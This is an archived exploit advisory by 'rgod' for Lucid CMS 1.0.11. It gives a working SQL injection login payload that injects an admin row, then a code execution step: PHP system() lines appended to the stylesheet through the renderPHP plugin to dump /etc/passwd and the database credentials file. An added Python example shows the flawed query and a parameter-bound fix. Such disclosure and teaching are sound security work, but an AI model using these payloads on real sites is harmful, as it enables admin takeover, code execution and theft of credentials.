Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution
software: Lucid CMS 1.0.11
site: http://lucidcms.net/
description:
lucidCMS is a simple and flexible content management system for the individual or
organization that wishes to manage a collection of web pages without the overhead
and complexity of other available "community" CMS options.
1) if magic quotes off -> SQL Injection:
you can login as admin typing in login form:
login: 'UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [nothing]
(the hash in the injected row, d41d8cd98f00b204e9800998ecf8427e, is the hash of... nothing: the result of md5(''))
note: "login" without spaces
the login query becomes:
SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com','d41d8cd98f00b204e9800998ecf8427e','1')/*'
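The query-building mistake above, and the parameter-bound form that closes it, as an added Python example that is not part of the advisory or of Lucid CMS: it rebuilds the concatenated login query from the advisory's injected login name, shows why magic_quotes_gpc (approximated here by an `addslashes` function) happened to block that exact string, and runs the bound lookup against a constructed in-memory SQLite stand-in for `lucid_users`. The column names, the `editor` user and its password are assumptions; only the six-value row shape and the MD5 password column come from the advisory.

```python
import hashlib
import sqlite3

# The advisory's injected login name, with the archive's concealed e-mail kept as printed.
INJECTED_NAME = (
    "'UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com',"
    "'d41d8cd98f00b204e9800998ecf8427e','1')/*"
)

# md5('') - the value the injected row carries in its password column, so that an
# empty password field matches it.
EMPTY_MD5 = hashlib.md5(b"").hexdigest()


def make_db():
    """Constructed six-column stand-in for lucid_users. The real column names are
    not given in the advisory; only the six-value shape and the MD5 hex digest in
    the password column are."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE lucid_users (id INTEGER, name TEXT, display TEXT, "
        "email TEXT, password TEXT, grp INTEGER)"
    )
    # MD5 is used here only to mirror the CMS's stored format; a current
    # deployment would store a salted password hash instead.
    db.execute(
        "INSERT INTO lucid_users VALUES (1, 'editor', 'Editor', "
        "'editor@example.invalid', ?, 2)",
        (hashlib.md5(b"correct-horse").hexdigest(),),
    )
    return db


def vulnerable_login_query(name):
    """String-built query of the shape the advisory shows: the login name is pasted
    into the SQL text, so a quote inside it closes the literal and everything after
    it is parsed as SQL."""
    return "SELECT * FROM lucid_users WHERE name='" + name + "'"


def addslashes(s):
    """Approximation of PHP's magic_quotes_gpc escaping. It neutralises this exact
    payload (the leading quote becomes \\'), which is why the advisory is
    conditional on magic quotes being off, but escaping is not a substitute for
    parameter binding."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def safe_login(db, name, password):
    """Parameter-bound lookup: the name travels as data, never as SQL, so the
    injected string is compared literally against the name column and matches no
    row. Returns the user's name on success, None otherwise."""
    row = db.execute(
        "SELECT name, password FROM lucid_users WHERE name = ?", (name,)
    ).fetchone()
    if row is None:
        return None
    if hashlib.md5(password.encode()).hexdigest() != row[1]:
        return None
    return row[0]


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login_query(INJECTED_NAME))
    print("escaped by magic quotes:", addslashes(INJECTED_NAME)[:12], "...")
    print("bound lookup, injected name:", safe_login(db, INJECTED_NAME, ""))
    print("bound lookup, real user:", safe_login(db, "editor", "correct-horse"))
```

The concatenated query reproduces the advisory's line exactly, which is the check to run against any login handler: if the name the user typed appears verbatim in the SQL string, the handler is injectable regardless of the magic_quotes setting.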
2) remote code execution:
now the new admin can edit the template and insert evil javascript code, see the phpinfo(), manage users/groups,
activate/disable plugins; you can activate the renderPHP plugin and add the following line at the end of
the main stylesheet:
<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>
to see the /etc/passwd file, or:
<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>
to see the database username/password, the database name and the table prefix... now you have full control
of the database
rgod
site: http://altervista.org
mail: retrogod (at) aliceposta (dot) it
original advisory: http://rgod.altervista.org/lucidcms1011.html